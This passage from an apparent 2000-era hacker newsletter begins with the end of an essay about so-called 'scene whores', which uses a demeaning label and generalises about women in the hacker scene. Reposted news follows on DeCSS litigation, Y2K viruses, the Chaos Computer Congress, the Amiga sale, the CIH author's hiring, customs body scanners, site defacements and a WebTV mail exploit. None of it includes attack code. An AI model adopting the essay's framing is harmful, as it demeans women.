that you are a hacker has nothing to do with it. They aren't
out for your money, for your friends, to be in the news
papers, or to see you commit crimes on computers.

There is a possibility I am looking at this all wrong, and of
course most of this is based off of what I have seen, my
thoughts and opinions. There are hackers who like scene
whores, because they know it won't last, but it is like an
adventure. However the hackers who like the scene whores
usually leave time for their friends, and don't get swallowed
up by them. However, these hackers help contribute to
keeping scene whores around, and eventually the scene
whores they let stick around, will end up ruining some other
hackers life, or a period of it anyway.

Last, I contemplated doing this article for some time. It is a
controversial subject, especially because of what I
mentioned in the preface, that it seems biased against
woman, and that it generally applies to them, and because
of the number of men Vs. the number of woman that are real
hackers, and because I have never seen a guy go around
and sleep with as many hacker woman as he could, I can't
really put the article into that perspective. On another note,
just to reiterate what I said in the start, this article is not
about you, or anyone you know. It is not about anyone
period. It is about the concept of scene whores, why they do
it. I would have added in on how to stop them, but the only
way to stop them is to identify them, and to control yourself.
Think with your head, and not any other part of you. As well,
if you do happen to get in with one, get health insurance,
because it could do serious damage to your heart.

Thanks to the Proof Readers:
Anonymous
xs

@HWA

36.0 DVD Control Association Looses First Round 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
Santa Clara County Superior Court Judge William Elfving
has denied the DVD Copy Control Association's request
for a restraining order against numerous web sites and
individuals. The DVD CCA had hoped that the restraining
order would prevent people from distributing DeCSS a
program written to allow the playing of DVD movies on
regular computers and not DVD players. While the
restraining order was denied the war is not over yet.
Trial has been scheduled for January 14, 2000. The EFF
provided preliminary legal assistance in this case.

Associated Press - via Yahoo
http://dailynews.yahoo.com/h/ap/19991229/tc/dvd_copying_suit_3.html

Industry Standard - via Yahoo
http://dailynews.yahoo.com/h/is/19991229/bs/19991229242.html

Electronic Defense Foundation
http://www.eff.org/

HNN's copy of the legal complaint
http://www.hackernews.com/special/1999/dvdinjunction.html

DeCSS Defense Site
http://www.lemuria.org/DeCSS/

DVD Copy Control Association
http://www.dvdcca.org/dvdcca/index.html

@HWA

37.0 First Viruses of the New Year Discovered 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by The Ringo and turtlex
Computer Associates has announced the discovery of
the first new virus/trojans of the new year. While some
of the four pieces of code that have been discovered do
contain destructive payloads none of the four are
considered extremely dangerous. (Four? That's it?
Where are the predicted 30,000 Y2K viruses?)

ZD Net
http://www.zdnet.com/zdnn/stories/news/0,4586,2415783,00.html?chkpt=zdhpnews01

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/19991231/tc/yk_computerassociates_1.html

Say hello to Feliz.Trojan and Armagidon

CA spends weekend publicizing low-grade
viruses. The latest two pack some punch, but
appear little more virulent than WScript.Kak,
Trojan.Kill.

By Robert Lemos, ZDNet News
UPDATED January 2, 2000 2:48 PM PT

It's already been a busy new year for virus watchers
at Computer Associates International Inc., which
used the weekend to issue the first virus warnings of
the year 2000.

CA (NYSE: CA) followed up two earlier warnings with two
more on Sunday, issuing releases warning of Feliz.Trojan
and Armagidon, a new Word macro virus. Both are
potentially destructive. Feliz.Trojan can cause PCs not to
boot, and Armagidon can cause documents to print with
incorrect characters. Armagidon will also replace the
Windows mouse pointer with a Red Cross symbol on
May 8, which is Red Cross Day.

CA officials were not immediately available to assess the
potential virulence of these new viruses. There was no
mention of them on other virus sites. The other viruses
CA issued warnings of were not considered very
dangerous.

On Saturday, CA released an alert that warned users of
Wscript.Kak, a worm that spreads via systems that use
both Microsoft Windows 98 and the Microsoft Outlook
Express 5.0 e-mail client. A company official
acknowledged that Wscript.Kak was not particularly
virulent.

"From a risk perspective, this is fairly low. You have to
send an e-mail for it to spread," said Simon Perry,
security business manager at CA in an interview with
ZDNN on Saturday. "A self-propagating virus, like
Melissa, will spread itself to several others automatically,
and by the nature of the propagation you get a threat."

While the Melissa macro virus, which struck thousands of
companies last March, required the user to open an
attachment, once that had occurred the virus spread
exponentially.

Like Melissa, Wscript.Kak does not appear to do any
damage to systems, but merely spreads itself by
attaching a copy of the virus onto every e-mail that a user
sends. That makes it a potential nuisance, at worst. The
systems of corporate and home users that have turned off
scripting -- a recommended strategy after the appearance
of BubbleBoy two months ago -- will not be infected.

"Though this virus isn't Y2K-related, its discovery further
confirms that hackers will exploit fears throughout the
Y2K changeover," Perry had said in a press release
issued Saturday. The statement seemed somewhat
ironic, since the lack of a malicious payload or any
mention of it by other anti-virus firms suggested that CA
itself is capitalizing on those fears.

Perry told ZDNN that a CA client found the worm, so that
even though the virus has been classified as "low risk,"
the company believed publicizing it was the best course.

Has potential to spread
One aspect of the worm that could lead to its spreading
quickly is that users don't have to click on an attachment
to trigger the malicious code. If a user's Internet Explorer
security settings are set to low or medium, the worm will
infect the system without any user action, said the
company.

The worm will then go on to change the signature settings
of the user's mail to its own and then attach itself to every
e-mail message the user subsequently sends. Users who
have the Windows Scripting Host option turned off will not
be susceptible to this, or any, scripting virus.

After infecting the computer, the worm will shut down
Windows. After the system reboots, the worm will be
running in the background, waiting to infect every e-mail
the user sends out. Otherwise, CA doesn't report any
malicious payload in the virus.

Trojan.Kill more destructive
Earlier this week, CA reported another virus distributed
through pirated copies of Windows 98 operating systems.
The virus, known as Trojan.Kill, could wipe out information
saved on computers when their dates roll past Jan. 1.

"Since Trojan.Kill is directly related to Y2K and carries a
destructive payload, we're concerned about the damage it
can do," said Perry.

"Obviously this virus is specifically targeted at illegal
software, and Computer Associates strongly
recommends that all software deployed either in the
business environment or for home use is a legal copy,"
Perry said in a statement.

pread through traditional means such as e-mail, shared
drives or floppy disks, Trojan.Kill hides behind a setup file
called "Instalar.exe."

Reuters contributed to this report.

-=-

Reuters:

Friday December 31 7:34 PM ET

Computer Associates Warns of New Viruses

NEW YORK (Reuters) - Computer Associates International Inc. Friday warned
of several computer viruses the company said were part of string of
viruses timed to take advantage of fears about the changeover to the Year
2000.

The Lucky 2000 virus, which runs on Microsoft Windows 95, 98 and NT
platforms, infects files that use the Visual Basic programming language,
Computer Associates said. The virus wipes out the content of the file but
does not change the name so a user will not know a file has been
infected until it is run.

Lucky 2000 sends users to a Russian Web site when they try to run infected
files.

The company also warned about the Esmeralda.807 virus, which causes a
delay when a user opens a 32-bit Windows file, making it appear that the
computer has temporarily frozen. The Spaces.1633 virus harms the start-up
function of the computer.

A separate virus, called Zelu.Trojan, has the potential to destroy all
files on an infected machine while pretending to be the antidote to a Y2K
bug. It arrives as an executable with the name Y2K.EXE.

``All computer users must take extra precautions during this virus
onslaught,'' said Simon Perry, business manager of security at Computer
Associates. ``We can't stress enough the importance of powerful and
reliable antivirus software as virus writers continue to exploit
user fears on the eve of Y2K.''

Computer Associates said further virus-related information is available at
http://www.cai.com/virusinfo, and it said it is offering free downloads of
antivirus software for personal use at http://antivirus.cai.com.

The company provides software, support and integration services, mostly to
businesses,

Shares of Computer Associates closed down 7/16 at 69-15/16 on Friday on
the New York Stock Exchange.

@HWA

38.0 Reports from Chaos Computer Congress 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by evenprime
Steve Kettmann reports from Germany for Wired on the
16th annual Chaos Communication Congress. (There
isn't much new in these reports if you have ever been
to any con before.)

Wired - CCC Women Were Odd Men Out
http://www.wired.com/news/culture/0,1284,33346,00.html

Wired - Oh, How the CCC Has Evolved
http://www.wired.com/news/culture/0,1284,33342,00.html

CCC Women Were Odd Men Out
by Steve Kettmann

9:35 a.m. 30.Dec.1999 PST BERLIN -- There was a lot of talk about family
and community at this year's Chaos Computer Club annual congress. But a
lot of women were wondering: Whose family?

To call Chaos male-dominated is a vast understatement. And that didn't go
down too well in some quarters.

To mollify the women who were there, they were promised a "hack center" of
their own. But the hordes of pasty-faced teens with monitors under their
arms needed space, and they took over the room. An open confrontation
ensued.

"Some of them said they didn't think a women's room was necessary," said
Nina Corda, an ISP hotline worker from Bremen who was a key organizer of
the women's room. "They said, 'Just because you're a woman doesn't mean
you get special treatment.'"

Corda, a smiling woman who speaks fondly of her days street-fighting
against neo-Nazis, was not about to sit still for that sort of talk.

"We are marginalized in the CCC," she said. "Just take a look around."

Corda appealed to the CCC leadership. The top logistical organizer for the
conference, Tim Pritlove, finally relented and transformed it back to a
women's room. Several women-only workshops were held, including one on
Linux instruction in which about 25 attended.

It was a victory in the sense that even though women comprised only about
10 percent of the total attendance, they still were a presence.

"When I asked Tim, he said it didn't look like we were doing anything in
the room, because we had only set up one computer," Corda said. "I said,
'Hacking isn't only about computers. It's a state of mind.' Technically,
I'm not the strongest. For me it's more a political thing.

"Hacking to me is about always wanting to know more, and not thinking that
you already know it all."

As a sort of compromise, this year's women room was not called a "women's
room" but a "know-it-all free zone."

"They were not that rare and exotic as last year, but it's still a small
group," said CCC spokesman Andy Mueller-Maguhn. "I wouldn't say it's a
problem. What's remarkable is not so much the number of women but their
handling of computers and their handling of the situation. In my
point of view, the women are starting to get really cool and really tough.
They have a status of self-consciousness which is really remarkable. They
say very loud and clear what they want." Interviews with women at the
congress revealed a split. One group favored a more combative demand for
inclusion. Another group believed more in jumping right in and making a
longer-term bid for influence.

"We will take over within 10 years," joked Nika Bertram, a member of the
Kologne CCC.

"You have to do things on your own," she said. "What cyber-feminism wants
is to find its own way, and then talk to the men, and not hear, 'Your way
is not the right way.' Maybe it's better not to have men telling you how
to do things.' But it's actually a very open scene. The boys are
very nice. We like them. No one ever said, 'There is the coffee machine.'"

Kologne CCC member Christine Ketzer, who helped lead a workshop titled
"Big Brother Is Watching," agrees.

"Some women aren't interested in technology for technology," she said.
"They are more interested in the social angle. It's really important for
women to make themselves visible in the scene. It's very important to talk
about the real serious topics and to become network administrators
and things like that."

Ketzer and Bertram both thought that the women they knew in the scene
tended to shy away from speaking out and making their presence felt.
Mueller-Maguhn made much the same point in explaining why more women were
not scheduled to lead workshops.

"Back in November, I sent out emails asking everyone who they wanted to
hear, and there were no suggestions like that," he said. "I think it has
to do with presenting yourself, and that is more of a man's domain."

It was all disturbingly familiar to Rena Tangens and Barbara Thoens, the
most famous women CCC veterans. Tangens attended her first CCC congress in
1988.

"I was shocked," she said. "I was the only woman there. Well, there was
one other woman there, but she was making cake. I decided I had to do the
job myself. I led a workshop the next year on finding the advantages of
different approaches to computers."

Thoens soon joined in, and in the mid-90s served a two-year term as CCC
president. The two women made a video making sport of how men explain
technology. "They say, 'Let me do it,'" Thoens said, and both women
laughed.

But this year's fight over a women's room, one they thought they had
settled years ago, left both feeling sad.

"It's not fair," Tangens said. "It's just looking at the male view and
ignoring everything else."

Added Thoens: "The way of communicating between men is very loud and
noisy, especially in the Berlin CCC. I like that, but some women don't.
The men say the women have to shout, too, if they want to be heard. I
always try to explain our concept and the men don't understand. I
tell them 'It's good for you if there are a lot of women.' But the Berlin
group would be happy if it was all men, just so long as you're seriously
interested. "I think next year it will be
really difficult again organizing the women's room."

-=-

Wired #2: Oh how CCC has evolved

Oh, How the CCC Has Evolved
by Steve Kettmann

9:35 a.m. 30.Dec.1999 PST
BERLIN -- It says everything about how the Chaos Computer Club has evolved
over its 16 years that Internet access kept disappearing at this week's
annual congress, and the main reaction was easy-going jokes.

The three-day congress was held in an old East Berlin official building called
the Haus am K�llnischen Park, the former training school for East German party
members. Technical limitations prompted CCC techies to opt for Web access
via a radio hookup, and the results were repeated, hours-long interruptions.

"The times the Internet doesn't work, we have more people in the workshops,"
CCC spokesman Frank Riegr observed.

If it seems like there is no such thing as hacking without an Internet connection,
well, time to update. To many at the congress, "hacking" meant anything from
thinking creatively to questioning authority to getting a buzz going.

The hacker persona has changed a lot since 1984, when CCC co-founder Steffen
Wernery was organizing the first annual congress.

"It was illegal to have a modem," he said. "You looked like a criminal if you had
a computer and a phone connection. Now every computer has that."

Lock-picking to us?: Once again, as at last summer's CCC-sponsored hacker camp
outside of Berlin, the lock-picking workshops and competitions were a big hit.
Tool kits were on sale, and practical information was abundant on how
to use simple tools to make locks melt like butter.

Lock-picking sport clubs have popped up all over Germany, spawned by the example
of the Hamburg club, a spinoff of the CCC. But Wernery, the club president, said
that of its 500 members, only 13 are CCC members. Membership really took off after
last summer's camp.

"Since the camp, we have a lot of international contacts," he said. "There are
clubs now in France, Finland, the Netherlands."

Next stop? America, of course. Wernery and his followers are trying to organize
a trip to New York City for H2K, an American hacking gathering scheduled for
14-16 July.

Last year's German lock-picking champion, Johannes Markmann, tried to capture
the allure of what he and the others are spending so much time doing.

"The idea is to break taboos," he said. "A taboo is only a taboo if you don't
speak out about it. It is art, what we do."

Added Wernery: "The only problem is the (lock-making) industry, which is selling
such bad stuff."

Game fever: There was some internal controversy over just what was being done on
the hundreds of computers brought by congress attendees.

Seems there's something of a videogame problem. Quake is more like a cult in CCC
land.

"It's a hack center, not a game center," said one typically outraged participant
during the closing discussion session. "If we continue like this, the congress
will be just a party under a tent in five years."

Media blackout: If there was any consensus among CCC members, it concerned the
media: Keeping them away was a good idea. The number of attending journalists
has shrunk to about 30, down from 100 one year ago.

"We did nothing to encourage journalists to come this year," Riegr said.
"We wanted the congress to be more for the CCC family, and to give us a
chance to think about what we are doing, and not to share that with the public."

@HWA

39.0 Gateway Sells Amiga 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The old favorite Amiga has been sold once again. This
time Gateway, the most recent owner of the Amiga
name and technology, has sold it all to a company
known as Amino Development Corp. Faithful Amiga users
around the world had hoped that Gateway would revive
the brand when they acquired it back in 1997. Evidently
they will have to wait a little longer. However, since
Amino is run by Bill McEwen, the former Amiga, Inc.
marketing chief, they hopefully won't have to wait very
long.

Reuters - via ABC News
http://abcnews.go.com/wire/US/reuters19991231_1089.html

The UK Register
http://www.theregister.co.uk/991231-000006.html

Gateway Sells Rights to Amiga Name

NEW YORK (Reuters) - Personal
computer maker Gateway Inc. (GTW.N)
signed a deal to sell its Amiga trademarks
and computer systems to closely held
Amino Development Corp., the companies
said on Friday.

Terms of the deal were not disclosed.

Gateway senior vice president Peter Ashkin said in a
statement the company elected to sell the Amiga name
after deciding to wrap Amiga's software engineering
function into Gateway's product development systems.

San Diego-based Gateway, which acquired the rights to
Amiga's technology in 1997, had been planning to revive
the brand, prominent in the mid-1980s, for so-called
information appliances and PCs.

Gateway's shares closed at 70-1/8 on Thursday on the
New York Stock Exchange.

-=-

Posted 31/12/1999 8:23pm by Tony Smith

Gateway sells Amiga to ex-Amiga employee

Gateway has finally rid itself of the legacy of its acquisition of Amiga with a close-of-year
sale of the Amiga hardware spec., system software and brandname to Amino on
undisclosed terms.

And who do we find runs Amino? Step forward, Bill McEwen, the former Amiga, Inc.
marketing chief who quit the company earlier this year just before ex-president Jim Collas
was given the boot.

McEwen is well respected by the Amiga community, so his acquisition of the Amiga is likely
to be received postively -- doubly so since Gateway has long been viewed as the Amiga
world's chief bete noire, responsible not only for giving Collas the push but for
masterminding the software-only strategy pursued by his successor, Tom Schmidt, a
move that for many Amiga users was a tacit admission that Gateway was never really
interested in reviving the Amiga brand.

In fact, it may well have been interested in doing just that but to use it as the basis for its
own Internet appliance line. The snag here is the brand's poor level of recognition outside
the community, and the company may have felt that a new brand, one not sullied by years
in the IT wilderness, is probably more appropriate.

The work on the next-generation software technologies begun under Collas and continued
under Schmidt will be folded into Gateway's own Net device product development
operation, the company said.

Not surprisingly, the deal doesn't include Amiga-related patents awarded since 1997 --
Gateway is hanging on to those.

Given Gateway's lack of interest in the 'classic' Amiga, the sale should at least see its
continued existence as a computer platform. As yet, Amino hasn't said what its plans for
the classic Amiga, but a move into the open source world seems a likely move.

The Campaign to Open Source the Amiga (COSA), has been negotiating to open up the
classic Amiga OS for some time, so far without success (though Schmidt did seem
broadly receptive to the idea). COSA's argument is that the Amiga platform only has a
future if it expands its user base, and the best way of doing that is to open it up in the hope
of winning the same kind of broad support that Linux has achieved.

Certainly, the influx of new talent that such a move would encourage if the Amiga platform
isn't to dwindle further and become nothing more than a refuge for die-hards and 80s retro
fans. �

@HWA

40.0 CIH Author Hired by Taiwanese Company 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Yazmon
Wahoo International Enterprise Co has announced that
it has succeeded in luring Chen Ing-hau away from rivals
after the 24-year old completed his military service.
Chen has admitted to writing and releasing the deadly
CIH virus during his military tour. He was quickly
arrested following his confession but was released due
to lack of complaints brought against him.

Reuters - via Yahoo
http://dailynews.yahoo.com/h/nm/19991230/tc/virus_taiwan_1.html

Thursday December 30 12:13 AM ET

Taiwan Tech Firm Hires Chernobyl Virus Author
TAIPEI (Reuters) - A Taiwan technology firm keen to test its own hardware has hired the
super-hacker who created the notorious Chernobyl virus -- which laid waste to hundreds of
thousands of computers worldwide in April.

Wahoo International Enterprise Co said it recently fought off a score of high-tech rivals
competing to lure Chen Ing-hau after the 24-year-old completed Taiwan's mandatory military
service.

A remorseful Chen admitted he wrote the stealthy computer program during his tour of
military duty, and was arrested in April but soon released because no complaints were
filed in Taiwan.

The virus, also known as CIH, wipes out an infected computer's hard drive data every
April 26 -- the anniversary of the 1986 Soviet nuclear disaster at Chernobyl, Ukraine.

Chen's rogue program hit hardest in countries with weak anti-virus defenses, gumming
up hundreds of thousands of computers in South Korea, Turkey and China and thousands
in India, Bangladesh, the Mideast and elsewhere.

``Our chairman felt he was a rare computer professional and we decided to accept him
with an open heart,'' said Wahoo spokeswoman Vivi Wang.

Chen works in Wahoo's hardware testing department, she said.

Wahoo, which makes multilingual Linux operating systems, has said it plans to list its
U.S. arm, XLinux.com, on the Nasdaq stock market by June 2000.

@HWA

41.0 Body-Scanners Used by US Customs 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench
The US Customs Service has begun using new high-tech
scanners that can see through the clothing of
passengers and can search for contraband with an
image that shows the naked body. As an alternative to
a physical pat-down, frisk or strip search, suspected
international smugglers are being offered the body
scanner. To insure privacy customs officials have said
no image of the naked body is recorded or preserved.
(Yet. Wait until 'body matching' can be done as easily
as fingerprinting then they will start collecting data to
compare new scans against.)

Boston Globe
http://www.boston.com/dailyglobe2/365/nation/Rights_backers_fight_scanner_that_gets_under_clothes+.shtml

Rights backers fight scanner that gets under clothes

Customs uses it to seek contraband

By Michael Arena Newsday, 12/31/1999

EW YORK - With airports bracing for Y2K problems and possible
terrorism, the US Customs Service has begun using new high-tech
scanners that can see through passengers' clothing and search for contraband
with an image that shows the naked body.

International travelers who are suspected of smuggling drugs or carrying
weapons are being offered the body scanner as an alternative to a physical
pat-down or frisk when they pass through ports of entry at airports across the
country.

The scanner can display hidden guns, knives, batteries, digital watches,
explosive materials and packages of drugs secreted under clothing. Supporters
say scanners can help in the fight against terrorism and illegal drug
importation.

But privacy advocates say the technology's capability to show the full external
contours of the body, including male and female private areas, is an ''electronic
strip search'' that erodes constitutional protections and is more invasive than a
frisk, which is performed while a suspect is fully clothed.

Customs Commissioner Raymond Kelly says the body scanners give travelers
the choice of avoiding the physical contact of an external body search at the
hands of an inspector.

''The option is that we can pat you physically,'' he said, ''or you can step in
front of this machine. You don't have to do it.'' To insure privacy, no image is
recorded or preserved, he said. And the scanner operator is always the same
sex as the person under scan, said Kelly.

But Gregory T. Nojeim, legislative counsel for the American Civil Liberities
Union, has been fighting the technology since it was first proposed as a
security enhancement three years ago after TWA Flight 800 exploded off
Long Island.

He told an aviation safety conference shortly after the crash that ''the system
has a joy-stick driven zoom option that allows the operator to enlarge portions
of the image.''

The image is not in photographic detail, but it does provide a clear outline of
the person's body.

The manufacturer of the BodySearch device said that the concerns are
excessive. Robert Peters, vice president of American Science and
Engineering of Billerica, said ''You don't get a sharp line image.'' Scanning
private areas is necessary because ''that's one of the places where people hide
stuff.''

The Customs Service began installing bodyscanners over the last several
months as part of Kelly's overhaul of inspectional procedures in response to
charges of racial profiling and a congressional hearing that followed. Black
women in particular have complained that they were singled out for
pat-downs, and a group in Chicago has filed a class-action lawsuit against the
agency.

The Customs Service was unable to provide numbers for those who have
opted for scanning over frisks, and how many of these scans turned up
contraband. Scanners were recently installed terminals in New York, Miami,
Atlanta, Los Angeles and Chicago at a cost of about $125,000 each.

Nojeim said the body scanners are eroding constitutional rights. He cited other
dangers. ''It gives passengers a false choice designed to make them feel better
about being subjected to an instrusive search conducted without probable
cause of a crime. And it runs the risk of making airport search much more
common.''

But Peters responded that the scanner is an improvement over the frisk.

''A patdown requires a touching of the private area. A scanner never touches
anyone. You are never invading a person's private space,'' he said.

This story ran on page A12 of the Boston Globe on 12/31/1999.
� Copyright 1999 Globe Newspaper Company.

@HWA

42.0 Defacements Continue Unabated in the New Year 01/03/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond
For some reason web site defacements continue to
make news. While there where dozens of defacements
over the last few days those of Lloyd's of London, The
UK railways services company Railtrack, and the German
Police actually caused a big enough stir to grant some
news coverage. None of the defacements caused any
permanent damage and all where fixed very quickly.

BBC - Railtrack defacement
http://news.bbc.co.uk/hi/english/sci/tech/newsid_585000/585227.stm

Associated Press - via San Jose Mercury News - Railtrack defacement
http://www.mercurycenter.com/svtech/news/breaking/merc/docs/068585.htm

Reuters - via Wired - Lloyd's of London defacement
http://www.wired.com/news/business/0,1367,33390,00.html

Reuters - via Excite - German Police Union defacement
http://news.excite.com/news/r/991230/08/odd-hack

Attrition.org Defacement Mirror
http://www.attrition.org/mirror/attrition/2000-01.html

As of this writing Attrition has been down due to hardware problems
they lost the main hard disk on their machine, Radius.net is taking
over mirroring of defacements while they are down.

http://www.radiusnet.net/mirror.
Notification of defacements
can be sent to hacked@radiusnet.net.

BBC:

Hackers target UK rail information

How the site should appear

Hackers broke into and distorted
Railtrack's internet home page on Friday
as a Y2K prank.

The website provides online timetable
information for travellers using the UK's
railway services.

The message from the hackers read:
"Sorry, but due to the Y2K compatibility
problems there will be no trains operating
between 31-12-99 and 02-01-00."

The hackers then sent their
greetings to "all the Railtrack
directors, all the sheep in Wales"
and acquaintances with names like
HackUK, Rootworm and Slacker.

Railtrack quickly corrected the
site. A Railtrack spokeswoman
said: "This is a prank that is supposed to be amusing.

"Unfortunately it will affect hundreds and thousands
of people who are trying to get into London for the
millennium eve celebrations.

"We would like to reassure all our customers that
trains are running as published."

Railtrack has spent four years checking and
correcting its computers.

The company, which is responsible
for the all the track, signals and
some stations in the UK's privatised
rail network, was deemed to be
100% compliant under the
government's Action 2000
millennium readiness "traffic light" assessment
process.

it is also operating a command centre through to the
end of March to co-ordinate Year 2000-related
problems that crop up.

-=-

Reuters:

Posted at 8:14 a.m. PST Friday, December 31, 1999

Hackers break into rail network's Web page

LONDON (AP) -- Hackers broke into an official Web site and issued a false
warning that train service in Britain had been canceled Friday
due to millennium bug problems.

The warning, which read ``No trains today,'' was discovered on Railtrack's
Internet site at about 9 a.m., officials said. The hoax message also
sent greetings to all Railtrack directors and ``all the sheep in Wales.''

Instead of the usual menu, which lets people check train timetables around
Britain, the hoax message said no trains would run from New
Year's Eve until Jan. 3 because of Y2K computer problems. The rest of the
site was still operating, but more difficult to access, officials said.

After discovering the hoax, computer experts had it fixed by 11:30 a.m.,
said Railtrack spokeswoman Lynn Harvey.

``It was annoying rather than a problem,'' Harvey said. ``People were
inconvenienced.''

Many Britons rely on the Web site to check timetables to plan their travel
arrangements. Particularly with the long holiday weekend, the number of
people relying on train service was expected to be high.

``This is a prank which is supposed to be amusing,'' Railtrack, the company
that runs Britain's rail lines, said in a statement. ``Unfortunately it will
affect hundreds and thousands of people who are trying to get
into London for the Millennium Eve celebrations.''

-=-

@HWA

43.0 WebTV Hole Causes Spam 01/04/00
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

"I want, I want, I want my WebTV"

From HNN http://www.hackernews.com/

contributed by Evil Wench
Exploit code currently circulating on the internet allows
someone to send email from a WebTV user's box without
the user's knowledge and can also be used to
compromise the security of users' stored mail. The
exploit is being embedded in posts in WebTV's
alt.discuss newsgroups, emails, and web pages. It then
directs any WebTV box that loads the page to send an
email message to an address set in the code.

Net4TV
http://net4tv.com/voice/story.cfm?StoryID=1823

Wired
http://www.wired.com/news/technology/0,1282,33420,00.html

WebTV Security Breach: Hijack Code
Can Forward Stored Mail
Laura Buddine
(January 2, 2000)

Net4TV Voice has learned that the
"hack" code that is being used to
send email from a WebTV user's
box without the user's knowledge
also is being used to compromise
the security of users' stored mail.

The code, which is being
embedded in posts in WebTV's
alt.discuss newsgroups, emails and
web pages, directs any WebTV
box that loads the page to send an
email message to an address set in
the code. The code executes "in
the background;" users who have sent the mail do not see any
indication of mail being sent, and only find out about it if they receive
a reply or look in their Sent Mail folders.

Now, Net4TV Voice has learned that the code has even more
serious security implications. It also has been used to forward email
from users' own Sent Mail and Saved Mail folders to an address set
in the code. Although hackers cannot directly see the email that a
WebTV user has within his/her own account, they can forward it out
into their own email account on another service, helping themselves
to a user's private correspondence and information. Net4TV Voice
has been shown how this can be done, and also has heard from one
user whose email account has apparently been violated.

Code Known At Least Since September

The basic email code that is the key to controlling a WebTV user's
mailbox has been known by some users since at least September,
when it was discussed in one of the WebTV hacking newsgroups. A
number of the frequenters of the group used the code to create
"receipts" in their mail so that they would receive a mailback when
the email was opened and read, or as a watch of their web pages so
that they could see who was surfing it. "It was not intended to be
used for malicious purposes," wrote one of the WebTV users who
made use of the code. "Of course, some with questionable intent got
a hold of the code and used it for other than the original purpose."

Mods Know About Code, But Customer
Service, Abuse Don't Get It

Among other things, the code has been used to bombard WebTV's
Abuse Department with profane complaints, and to cause users to
unknowingly send nasty messages to others. One of the problems is
that there is no way within the email itself to prove that the box it
came from did not originate the email; one WebTV user has written
to Net4TV Voice that WebTV's Compliance Department is
threatening her with termination for "spamming," even though the
email is being triggered by an email containing the code that is in her
box.

On December 21, a moderator in the official webtv.users newsgroup
posted a warning that users should not go into a hacking newsgroup
because of the code. The warning, which was published in Net4TV
Voice's mid-issue story, User Alert: WebTV Email 'Hack' Can
Send Mail From Your Box, claimed that the code itself was
created by "some users." In fact, the code was created by WebTV
itself (as were all elements and codes in the WebTV software).
Net4TV Voice has since been advised that the code itself was
previously posted in webtv.users and was "slipped past the mods."

Often, the emails containing the code also contain another "no send"
code that prevents them from being forwarded or "bounced." This
prevents the trouble-making mail, post, or page from being forwarded
to WebTV Abuse as evidence. This has led to some ludicrously
frustrating exchanges with WebTV Customer Service in the WebTV
Help Center, which insists that they cannot do anything and that posts
must be forwarded to Abuse before action can be taken. WebTV
user JaxRed offered this example that he had received after he wrote
to them explaining the problem and that the posts had "no send" codes
preventing them from being forwarded:

Dear Customer,
Thank you for writing WebTV.
We understand your concern regarding this matter.
However, this is not an issue that the Customer Service
Center, can help you with. We apologize for the
misunderstanding on our part regarding this
matter. However, this is a matter that you will to
forward (sic) on to Abuse@webtv.net. Abuse will look
into this matter further for you. Please forward any and
all the information that you have regarding this matter to
Abuse@webtv.net. Please only forward this matter
once, as if this issue is forwarded more than once there
is a chance that this issue will be rejecked.(sic)

Another user, however, received a different response from the
Customer Service Center when she complained about a post made by
a self-proclaimed hacker:

Dear Customer,
Thank you for writing WebTV.
We are aware of this issue and are working on
removing this person. We do appreciate your feedback.
I will pass this information along for you.

Waiting for WebTV's Response

Net4TV Voice contacted WebTV Networks on Thursday in
preparation for this story, but were advised that because of the New
Year's holiday, they would be unable to respond until January 3.
Although we declined to hold the story to wait for their response, we
will post an update to the story when we receive it.

However, Net4TV discussed the issue with a former WebTV
employee who was involved in the operation of the WebTV servers.
These were his comments:

WebTV's machines already filter certain content before
sending it along to our boxes. They call it transcoding.
Essentially what happens is they replace certain HTML
with their own, mainly for their own security but also
for functionality in some cases. What this means is that
WebTV's machines already go through every line of
code, whether on a web page or in an e-mail or
newsgroup post, looking for the offending HTML and
transcoding as necessary before our boxes receive it.

That's why I can't understand what's taking them so
long to fix this thing. It's probably easier said than done
but a quick solution would be to add this mail exploit
code to the list of code they're already filtering and be
done with it, at least until they can address the problem
more thoroughly in a future client build. That'd have to
be done eventually because there are certain situations
where our boxes by-pass WebTV's machines (and thus
the transcoding) but in the meantime the overwhelming
majority of the problem would be solved.

WebTV's Security History

This is not the first time that codes that WebTV created for their own
purposes have either been leaked or discovered by users and used to
create security holes and "bombs." About eighteen months ago,
WebTV's email was actually hacked by a WebTV user, who was
then trapped by a "hacking contest" that got him to reveal how he had
done it. The hack was reported by the "trapper" to WebTV and that
hole was closed.

But more holes remained, including some that had many WebTV
users playing "Doom" long before it was released (and only to
DishPlayer users). Last spring, some WebTV users found another
code that could be used to insert and rearrange Favorites folders in
other users' boxes, while the use of a WebTV code that could wipe
out users' accounts (the Amnesia Bomb) caused such problems that
WebTV was forced to rush out a browser update to stop it
(Amnesia Bomb Halts Plus Update).

The most serious security breach was revealed in September, when
Net4TV Voice broke the story WebTV Spam Block Revealing
User, Subscriber IDs. WebTV tried to downplay the seriousness of
the breach, claiming that nothing could be done with the IDs even if
they were revealed (not true -- with a user ID known, it was possible
to terminate a user's account remotely); WebTV's Customer Service
department even sent email to users in which they claimed that the
Net4TV Voice story was "bogus" and that Net4TV was working
with spammers to get the maximum amount of spam delivered to
WebTV users. When confronted by CNet and ZDNet, however,
WebTV admitted the security breach was true but stated that it had
been fixed.

Microsoft itself has also had its security problems, with breach after
breach in HotMail security finally causing the company to announce
that it was calling in an independent outside auditor to review its
security. Microsoft would not release the name of the auditing
company, stating only that it was one of the "big five," but did admit
that its biggest breach had been caused by a string of code that hadn't
